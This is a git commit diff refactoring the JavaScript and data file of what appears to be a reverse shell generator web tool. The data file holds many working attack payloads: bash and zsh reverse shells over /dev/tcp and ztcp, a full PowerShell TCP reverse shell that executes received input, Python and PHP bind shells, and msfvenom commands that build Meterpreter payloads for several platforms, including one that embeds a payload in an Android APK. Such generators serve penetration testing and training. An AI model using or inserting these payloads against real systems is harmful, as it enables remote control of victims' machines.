This commit is contained in:
alanfoster 2021-03-15 23:09:02 +00:00
parent 3204820e47
commit 822fc9aa66
3 changed files with 285 additions and 322 deletions

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
.netlify/

View File

@ -208,7 +208,7 @@
<ul class="nav nav-tabs" id="myTab" role="tablist"> <ul class="nav nav-tabs" id="myTab" role="tablist">
<li class="nav-item"> <li class="nav-item">
<a class="nav-link active" id="home-tab" data-toggle="tab" href="#reverse" role="tab" <a class="nav-link active" id="reverse-tab" data-toggle="tab" href="#reverse" role="tab"
aria-controls="reverse" aria-selected="true">Reverse</a> aria-controls="reverse" aria-selected="true">Reverse</a>
</li> </li>
<li class="nav-item"> <li class="nav-item">
@ -480,46 +480,83 @@
const bindShellCommand = document.querySelector("#bind-shell-command"); const bindShellCommand = document.querySelector("#bind-shell-command");
const msfVenomCommand = document.querySelector("#msfvenom-command"); const msfVenomCommand = document.querySelector("#msfvenom-command");
const FilterType = {
'All': 'all',
'Windows': 'windows',
'Linux': 'linux',
'Mac': 'mac'
};
document.querySelector("#os-options").addEventListener("change", (event) => { document.querySelector("#os-options").addEventListener("change", (event) => {
const selectedOS = event.target.value; const selectedOS = event.target.value;
const data = rsgData.reverseShellCommands; rsg.setState({
filter: selectedOS,
const filteredItems = data.filter(item => {
if (selectedOS !== "all") {
return item.meta.includes(selectedOS)
}
else {
return data;
}
}); });
document.querySelector("#reverse-shell-selection").innerHTML = "";
rsg.initReverseShellSelection(filteredItems);
}); });
document.querySelector("#reverse-tab").addEventListener("click", () => {
rsg.setState({
commandType: CommandType.ReverseShell
});
})
document.querySelector("#bind-tab").addEventListener("click", () => {
rsg.setState({
commandType: CommandType.BindShell
});
})
document.querySelector("#bind-tab").addEventListener("click", () => { document.querySelector("#bind-tab").addEventListener("click", () => {
document.querySelector("#bind-shell-selection").innerHTML = ""; document.querySelector("#bind-shell-selection").innerHTML = "";
rsg.initBindSelection(); rsg.setState({
commandType: CommandType.BindShell
});
}) })
document.querySelector("#msfvenom-tab").addEventListener("click", () => { document.querySelector("#msfvenom-tab").addEventListener("click", () => {
document.querySelector("#msfvenom-selection").innerHTML = ""; document.querySelector("#msfvenom-selection").innerHTML = "";
rsg.initMsfVenomSelection(); rsg.setState({
}) commandType: CommandType.MSFVenom
});
});
const filterCommandData = function (data, { commandType, filter }) {
return data.filter(item => {
if (!item.meta.includes(commandType)) {
return false;
}
if (!filter) {
return true;
}
if (filter === FilterType.All) {
return true;
}
return item.meta.includes(filter);
});
}
const rsg = { const rsg = {
currentCommandType: 'Bash -i', selectedValues: {
[CommandType.ReverseShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.ReverseShell })[0].name,
[CommandType.BindShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.BindShell })[0].name,
[CommandType.MSFVenom]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.MSFVenom })[0].name,
},
commandType: CommandType.ReverseShell,
filter: FilterType.All,
copyToClipboard: (text) => { copyToClipboard: (text) => {
if (navigator ?.clipboard ?.writeText) { // if (navigator ?.clipboard ?.writeText) {
navigator.clipboard.writeText(text) // navigator.clipboard.writeText(text)
$('#clipboard-toast').toast('show') // $('#clipboard-toast').toast('show')
} else if (window ?.clipboardData ?.setData) { // } else if (window ?.clipboardData ?.setData) {
window.clipboardData.setData('Text', text); // window.clipboardData.setData('Text', text);
$('#clipboard-toast').toast('show') // $('#clipboard-toast').toast('show')
} else { // } else {
$('#clipboard-failure-toast').toast('show') // $('#clipboard-failure-toast').toast('show')
} // }
}, },
escapeHTML: (text) => String(text).replace(/</, '&lt;').replace(/>/, '&gt;'), escapeHTML: (text) => String(text).replace(/</, '&lt;').replace(/>/, '&gt;'),
@ -528,21 +565,12 @@
getPort: () => Number(portInput.value || portInput.getAttribute('placeholder')), getPort: () => Number(portInput.value || portInput.getAttribute('placeholder')),
getSelectedCommandName: () => {
return rsg.selectedValues[rsg.commandType];
},
getReverseShellCommand: () => { getReverseShellCommand: () => {
const reverseShellData = rsgData.reverseShellCommands.find((item) => item.name === rsg const reverseShellData = rsgData.reverseShellCommands.find((item) => item.name === rsg.getSelectedCommandName());
.currentCommandType);
return reverseShellData.command;
},
getbindShellCommand: () => {
const reverseShellData = rsgData.bindShellCommands.find((item) => item.name === rsg
.currentCommandType);
return reverseShellData.command;
},
getMsfVenomCommand: () => {
const reverseShellData = rsgData.msfvenomShellCommands.find((item) => item.name === rsg
.currentCommandType);
return reverseShellData.command; return reverseShellData.command;
}, },
@ -561,7 +589,6 @@
init: () => { init: () => {
rsg.initListenerSelection() rsg.initListenerSelection()
rsg.initShells() rsg.initShells()
rsg.initReverseShellSelection()
}, },
initListenerSelection: () => { initListenerSelection: () => {
@ -592,103 +619,16 @@
}) })
}, },
initReverseShellSelection: (items = rsgData.reverseShellCommands) => { // Updates the rsg state, and forces a re-render
items.map((item, index) => { setState: ({ filter, commandType } = {}) => {
const { if (filter) {
name, rsg.filter = filter;
command }
} = item; if (commandType) {
rsg.commandType = commandType;
}
const selectionButton = document.createElement("button"); rsg.update();
if (index === 0) {
selectionButton.classList.add("active");
rsg.currentCommandType = name;
rsg.updateReverseShellCommand();
}
const clickEvent = () => {
rsg.currentCommandType = name;
rsg.updateReverseShellSelection();
rsg.updateReverseShellCommand();
if (document.querySelector('#auto-copy-switch').checked) {
rsg.copyToClipboard(reverseShellCommand.innerText)
}
}
selectionButton.innerText = name;
selectionButton.classList.add("list-group-item", "list-group-item-action");
selectionButton.addEventListener("click", clickEvent);
document.querySelector("#reverse-shell-selection").appendChild(selectionButton);
})
},
initBindSelection: (items = rsgData.bindShellCommands) => {
items.map((item, index) => {
const {
name,
command
} = item;
const selectionButton = document.createElement("button");
if (index === 0) {
selectionButton.classList.add("active");
rsg.currentCommandType = name;
rsg.updatebindShellCommand();
}
const clickEvent = () => {
rsg.currentCommandType = name;
// rsg.updateReverseShellSelection();
rsg.updatebindShellCommand();
if (document.querySelector('#auto-copy-switch').checked) {
rsg.copyToClipboard(bindShellCommand.innerText)
}
}
selectionButton.innerText = name;
selectionButton.classList.add("list-group-item", "list-group-item-action");
selectionButton.addEventListener("click", clickEvent);
document.querySelector("#bind-shell-selection").appendChild(selectionButton);
})
},
initMsfVenomSelection: (items = rsgData.msfvenomShellCommands) => {
items.map((item, index) => {
const {
name,
command
} = item;
const selectionButton = document.createElement("button");
if (index === 0) {
selectionButton.classList.add("active");
rsg.currentCommandType = name;
rsg.updateMsfVenomCommand();
}
const clickEvent = () => {
rsg.currentCommandType = name;
// rsg.updateReverseShellSelection();
rsg.updateMsfVenomCommand();
if (document.querySelector('#auto-copy-switch').checked) {
rsg.copyToClipboard(msfVenomCommand.innerText)
}
}
selectionButton.innerText = name;
selectionButton.classList.add("list-group-item", "list-group-item-action");
selectionButton.addEventListener("click", clickEvent);
document.querySelector("#msfvenom-selection").appendChild(selectionButton);
})
}, },
insertParameters: (command, encoder) => { insertParameters: (command, encoder) => {
@ -700,10 +640,60 @@
update: () => { update: () => {
rsg.updateListenerCommand() rsg.updateListenerCommand()
rsg.updateReverseShellSelection() rsg.updateTabList()
rsg.updateReverseShellCommand() rsg.updateReverseShellCommand()
}, },
updateTabList: () => {
const data = rsgData.reverseShellCommands;
const filteredItems = filterCommandData(
data,
{
filter: rsg.filter,
commandType: rsg.commandType
}
);
debugger;
const documentFragment = document.createDocumentFragment()
filteredItems.forEach((item, index) => {
const {
name,
command
} = item;
const selectionButton = document.createElement("button");
if (rsg.getSelectedCommandName() === item.name) {
selectionButton.classList.add("active");
}
const clickEvent = () => {
rsg.selectedValues[rsg.commandType] = name;
rsg.update();
if (document.querySelector('#auto-copy-switch').checked) {
rsg.copyToClipboard(reverseShellCommand.innerText)
}
}
selectionButton.innerText = name;
selectionButton.classList.add("list-group-item", "list-group-item-action");
selectionButton.addEventListener("click", clickEvent);
documentFragment.appendChild(selectionButton);
})
const listTargets = {
[CommandType.ReverseShell]: '#reverse-shell-selection',
[CommandType.BindShell]: '#bind-shell-selection',
[CommandType.MSFVenom]: '#msfvenom-selection'
};
const listTarget = listTargets[rsg.commandType];
document.querySelector(listTarget).replaceChildren(documentFragment)
},
updateListenerCommand: () => { updateListenerCommand: () => {
const privilegeWarning = document.querySelector("#port-privileges-warning"); const privilegeWarning = document.querySelector("#port-privileges-warning");
let command = listenerSelect.value; let command = listenerSelect.value;
@ -723,14 +713,14 @@
updateReverseShellSelection: () => { updateReverseShellSelection: () => {
document.querySelector(".list-group-item.active") ?.classList.remove("active"); document.querySelector(".list-group-item.active") ?.classList.remove("active");
const elements = Array.from(document.querySelectorAll(".list-group-item")); const elements = Array.from(document.querySelectorAll(".list-group-item"));
const selectedElement = elements.find((item) => item.innerText === rsg.currentCommandType); const selectedElement = elements.find((item) => item.innerText === rsg.currentCommandName);
selectedElement ?.classList.add("active"); selectedElement?.classList.add("active");
}, },
updateReverseShellCommand: () => { updateReverseShellCommand: () => {
let command let command
if (rsg.currentCommandType === 'PowerShell #3 (Base64)') { if (rsg.getSelectedCommandName() === 'PowerShell #3 (Base64)') {
const encoder = (text) => text; const encoder = (text) => text;
const payload = rsg.insertParameters(rsgData.specialCommands['PowerShell payload'], encoder) const payload = rsg.insertParameters(rsgData.specialCommands['PowerShell payload'], encoder)
command = "powershell -e " + btoa(payload) command = "powershell -e " + btoa(payload)
@ -738,35 +728,7 @@
command = rsg.getReverseShellCommand() command = rsg.getReverseShellCommand()
} }
const encoding = encodingSelect.value; command = rsg.getReverseShellCommand()
if (encoding === 'Base64') {
command = btoa(command)
} else {
function encoder(string) {
return (encoding === 'encodeURI' || encoding === 'encodeURIComponent') ? window[
encoding](string) : string
}
command = rsg.insertParameters(
rsg.highlightParameters(
encoder(command), encoder),
encoder
)
}
reverseShellCommand.innerHTML = command;
},
updatebindShellCommand: () => {
let command
if (rsg.currentCommandType === 'PowerShell #3 (Base64)') {
const encoder = (text) => text;
const payload = rsg.insertParameters(rsgData.specialCommands['PowerShell payload'], encoder)
command = "powershell -e " + btoa(payload)
} else {
command = rsg.getbindShellCommand()
}
const encoding = encodingSelect.value; const encoding = encodingSelect.value;
if (encoding === 'Base64') { if (encoding === 'Base64') {
@ -784,37 +746,14 @@
) )
} }
bindShellCommand.innerHTML = command; const commandTargets = {
}, [CommandType.ReverseShell]: '#reverse-shell-command',
[CommandType.BindShell]: '#bind-shell-command',
[CommandType.MSFVenom]: '#msfvenom-command'
};
const commandTarget = commandTargets[rsg.commandType];
updateMsfVenomCommand: () => { document.querySelector(commandTarget).innerHTML = command;
let command
if (rsg.currentCommandType === 'PowerShell #3 (Base64)') {
const encoder = (text) => text;
const payload = rsg.insertParameters(rsgData.specialCommands['PowerShell payload'], encoder)
command = "powershell -e " + btoa(payload)
} else {
command = rsg.getMsfVenomCommand()
}
const encoding = encodingSelect.value;
if (encoding === 'Base64') {
command = btoa(command)
} else {
function encoder(string) {
return (encoding === 'encodeURI' || encoding === 'encodeURIComponent') ? window[
encoding](string) : string
}
command = rsg.insertParameters(
rsg.highlightParameters(
encoder(command), encoder),
encoder
)
}
msfVenomCommand.innerHTML = command;
}, },
updateSwitchStates: () => { updateSwitchStates: () => {
@ -835,8 +774,8 @@
* Event handlers/functions * Event handlers/functions
*/ */
const dropdownUpdate = () => { const dropdownUpdate = () => {
rsg.updateReverseShellCommand();
setLocalStorage(shellSelect, "shell", "value"); setLocalStorage(shellSelect, "shell", "value");
rsg.update();
} }
shellSelect.addEventListener("change", dropdownUpdate); shellSelect.addEventListener("change", dropdownUpdate);
@ -891,23 +830,23 @@
* @param {String} attribute - Attribute of element to apply localStorage value to * @param {String} attribute - Attribute of element to apply localStorage value to
*/ */
const prepopulateElement = (key, element, attribute, options = null) => { const prepopulateElement = (key, element, attribute, options = null) => {
if (localStorage.getItem(key)) { // if (localStorage.getItem(key)) {
// TODO: Use switch/case instead // // TODO: Use switch/case instead
if (element.type === "text") { // if (element.type === "text") {
element[attribute] = localStorage.getItem(key); // element[attribute] = localStorage.getItem(key);
} // }
if (element.type === "checkbox") { // if (element.type === "checkbox") {
const isChecked = (localStorage.getItem(key) !== 'false'); // const isChecked = (localStorage.getItem(key) !== 'false');
element[attribute] = isChecked; // element[attribute] = isChecked;
} // }
if (element.nodeName === "SELECT") { // if (element.nodeName === "SELECT") {
const selectedItem = options.find(option => option[attribute] === localStorage.getItem(key)); // const selectedItem = options.find(option => option[attribute] === localStorage.getItem(key));
selectedItem.selected = true; // selectedItem.selected = true;
} // }
} // }
} }
/* /*
@ -924,8 +863,6 @@
setTimeout(() => { setTimeout(() => {
const shellOptions = shellSelect.querySelectorAll(".shell-option"); const shellOptions = shellSelect.querySelectorAll(".shell-option");
prepopulateElement("shell", shellSelect, "value", [...shellOptions]); prepopulateElement("shell", shellSelect, "value", [...shellOptions]);
rsg.updateReverseShellCommand();
}, 500); }, 500);
prepopulateElement("ip", ipInput, "value"); prepopulateElement("ip", ipInput, "value");

View File

@ -1,24 +1,25 @@
const rsgData = { const CommandType = {
'ReverseShell': 'ReverseShell',
'BindShell': 'BindShell',
'MSFVenom': 'MSFVenom'
};
listenerCommands: [ const withCommandType = function (commandType, elements) {
['nc', 'nc -lvnp {port}'], return elements.map((element) => {
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'], return {
['pwncat', 'python3 -m pwncat -lp {port}'], ...element,
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'], meta: [
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'], ...element.meta,
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], commandType
['powercat', 'powercat -l -p {port}'] ]
], }
});
}
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'], const reverseShellCommands = withCommandType(
CommandType.ReverseShell,
upgrade: ['python', ], [
{
specialCommands: {
'PowerShell payload': '$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
},
reverseShellCommands: [{
"name": "Bash -i", "name": "Bash -i",
"command": "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1", "command": "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1",
"meta": ["linux", "mac"] "meta": ["linux", "mac"]
@ -228,97 +229,121 @@ const rsgData = {
"name": "zsh", "name": "zsh",
"command": "zsh -c 'zmodload zsh/net/tcp && ztcp {ip} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'", "command": "zsh -c 'zmodload zsh/net/tcp && ztcp {ip} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'",
"meta": ["linux", "mac"] "meta": ["linux", "mac"]
}
]
);
const bindShellCommands = withCommandType(
CommandType.BindShell,
[
{
"name": "Python3 Bind",
"command": "python3 -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",{port}));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'",
"meta": ["bind", "mac", "linux", "windows"]
}, },
{
"name": "PHP Bind",
"command": "php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,\"0.0.0.0\",{port});\\socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,\"$ \",2))exit;\\$in=socket_read($cl,100);$cmd=popen(\"$in\",\"r\");while(!feof($cmd)){$m=fgetc($cmd);\\socket_write($cl,$m,strlen($m));}}'",
"meta": ["bind", "mac", "linux", "windows"]
}
]
);
const msfvenomCommands = withCommandType(
CommandType.MSFVenom,
[
{
"name": "Windows Meterpreter Staged Reverse TCP",
"command": "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe > reverse.exe",
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
},
{
"name": "Windows Stageless Reverse TCP",
"command": "msfvenom -p windows/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe > reverse.exe",
"meta": ["msfvenom", "windows", "stageless", "reverse"]
},
{
"name": "Linux Meterpreter Staged Reverse TCP",
"command": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf >reverse.elf",
"meta": ["msfvenom", "linux", "meterpreter", "staged", "reverse"]
},
{
"name": "Linux Stageless Reverse TCP",
"command": "msfvenom -p linux/x86/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf >reverse.elf",
"meta": ["msfvenom", "linux", "meterpreter", "stageless", "reverse"]
},
{
"name": "Linux Meterpreter Staged Reverse TCP (x86)",
"command": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf > shell.elf",
"meta": ["msfvenom", "linux", "meterpreter", "staged", "reverse"]
},
{
"name": "macOS Stageless Reverse TCP (x86)",
"command": "msfvenom -p osx/x86/shell_reverse_tcp LHOST={ip} LPORT={port} -f macho > shell.macho",
"meta": ["msfvenom", "mac", "stageless", "reverse"]
},
{
"name": "PHP Meterpreter Stageless Reverse TCP",
"command": "msfvenom -p php/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php",
"meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"]
},
{
"name": "JSP Stageless Reverse TCP",
"command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f raw > shell.jsp",
"meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"]
},
{
"name": "WAR Stageless Reverse TCP",
"command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f war > shell.war",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
{
"name": "Android Meterpreter Reverse TCP",
"command": "msfvenom p android/meterpreter/reverse_tcp lhost={ip} lport={port} R > payload-name.apk",
"meta": ["msfvenom", "android", "android", "reverse"]
},
{
"name": "Android Meterpreter Embed Reverse TCP",
"command": "msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
"meta": ["msfvenom", "android", "android", "reverse"]
},
{
"name": "Python Stageless Reverse TCP",
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw > shell.py",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
{
"name": "Bash Stageless Reverse TCP",
"command": "msfvenom -p cmd/unix/reverse_bash LHOST={ip} LPORT={port} -f raw > shell.sh",
"meta": ["msfvenom", "linux", "macos", "stageless", "reverse"]
},
]
);
const rsgData = {
listenerCommands: [
['nc', 'nc -lvnp {port}'],
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
['pwncat', 'python3 -m pwncat -lp {port}'],
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
['powercat', 'powercat -l -p {port}']
], ],
bindShellCommands: [{ shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],
"name": "Perl Bind",
"command": "perl -e 'use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'",
"meta": ["bind"]
},
{
"name": "Python3 Bind",
"command": "python3 -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",{port}));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'",
"meta": ["bind"]
},
{
"name": "PHP Bind",
"command": "php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,\"0.0.0.0\",{port});\\socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,\"$ \",2))exit;\\$in=socket_read($cl,100);$cmd=popen(\"$in\",\"r\");while(!feof($cmd)){$m=fgetc($cmd);\\socket_write($cl,$m,strlen($m));}}'",
"meta": ["bind"]
},
],
msfvenomShellCommands: [{ upgrade: ['python', ],
"name": "Windows Meterpreter Staged Reverse TCP",
"command": "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe > reverse.exe",
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
},
{
"name": "Windows Stageless Reverse TCP",
"command": "msfvenom -p windows/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe > reverse.exe",
"meta": ["msfvenom", "windows", "stageless", "reverse"]
},
{
"name": "Linux Meterpreter Staged Reverse TCP",
"command": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf >reverse.elf",
"meta": ["msfvenom", "linux", "meterpreter", "staged", "reverse"]
},
{
"name": "Linux Stageless Reverse TCP",
"command": "msfvenom -p linux/x86/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf >reverse.elf",
"meta": ["msfvenom", "linux", "meterpreter", "stageless", "reverse"]
},
{
"name": "Linux Meterpreter Staged Reverse TCP (x86)",
"command": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf > shell.elf",
"meta": ["msfvenom", "linux", "meterpreter", "staged", "reverse"]
},
{
"name": "macOS Stageless Reverse TCP (x86)",
"command": "msfvenom -p osx/x86/shell_reverse_tcp LHOST={ip} LPORT={port} -f macho > shell.macho",
"meta": ["msfvenom", "mac", "stageless", "reverse"]
},
{
"name": "PHP Meterpreter Stageless Reverse TCP",
"command": "msfvenom -p php/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php",
"meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"]
},
{
"name": "JSP Stageless Reverse TCP",
"command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f raw > shell.jsp",
"meta": ["msfvenom", "windows", "linux", "meterpreter", "stageless", "reverse"]
},
{
"name": "WAR Stageless Reverse TCP",
"command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f war > shell.war",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
{
"name": "Android Meterpreter Reverse TCP",
"command": "msfvenom p android/meterpreter/reverse_tcp lhost={ip} lport={port} R > payload-name.apk",
"meta": ["msfvenom", "android", "android", "reverse"]
},
{
"name": "Android Meterpreter Embed Reverse TCP", specialCommands: {
"command": "msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk", 'PowerShell payload': '$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
"meta": ["msfvenom", "android", "android", "reverse"]
}, },
{
"name": "Python Stageless Reverse TCP",
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw > shell.py",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
{
"name": "Bash Stageless Reverse TCP",
"command": "msfvenom -p cmd/unix/reverse_bash LHOST={ip} LPORT={port} -f raw > shell.sh",
"meta": ["msfvenom", "linux", "macos", "stageless", "reverse"]
},
{
"name": "Perl Stageless Reverse TCP",
"command": "msfvenom -p cmd/unix/reverse_perl LHOST={ip} LPORT={port} -f raw > shell.pl",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
],
reverseShellCommands: [
...reverseShellCommands,
...bindShellCommands,
...msfvenomCommands
]
} }